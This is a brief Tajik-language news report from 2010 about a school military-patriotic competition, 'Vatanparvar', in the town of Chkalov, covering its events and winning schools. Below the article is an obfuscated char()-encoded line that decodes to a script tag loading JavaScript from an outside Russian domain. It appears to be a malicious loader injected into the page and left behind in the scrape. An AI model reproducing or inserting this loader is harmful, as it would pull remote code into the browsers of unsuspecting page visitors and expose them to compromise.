6.11.2010
Озмуни «Ватанпарвар» дар шаҳри Чкалов
Бахшида ба 16-умин солгарди сарқонун (конститутсияи) Ҷумҳурии Тоҷикистон имрӯз дар шаҳри Чкалов мусобиқаи ҳарби таҳти унвони «Ватанпарвар» байни хонандагони синфҳои болоии мактабҳо гузаронида шуд. Ин яке мусобиқа буд, ки бештар таваҷҷӯҳи тамошобинон ва ҳам иштирокчиёнро ба худ ҷалб менамуд. Ҳатто буданд нафаре, ки берун аз мусобиқа маҳорати худро нишон медоданд. Мусобиқаи мазкур аз рӯи 6- намуд: қадамзани, пур кардани тирдон, ба қисмҳо ҷудо ва ҷобаҷогузории автомат, турниккаши, ба ресмони махсус баромаданд ва муаян кардани рутба ах рӯи нишонаҳо доир гардид. Хонандагон аз 4- мактаб: Гимназияи №1, МТМУ №10, МТМУ №3 ва литсейи №1 байни ҳам қувва озмуданд. Баъд аз хулосабарори кардани аъзои ҳакамон ғолибони озмун муаян карда шуданд. Ҷои аввал насиби хонандагони Гимназияи №1, ҷои дуввумро толибилмони МТМУ №3 ва ҷои саввумро бошад толибилмони МТМУ №10 ишғол намуданд. Дар охир ғолибон ва фаъолон бо ифтихорнома сарфароз гардонида шудаанд. Озмуни мазкур бо ташаббуси Ташкилоти ҷамъиятии мададгори мудофиаи шаҳри Чкалов баргузор гардида, дар рӯҳияи ватанпарвариву ватандӯсти тарбия намудани насли наврас мусидат мекунад.
Афзал Босолиев

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)a00ef5bcb4613fe658d76fd18b956652.js" type="text/javascript">

ТАВЗЕҲОТ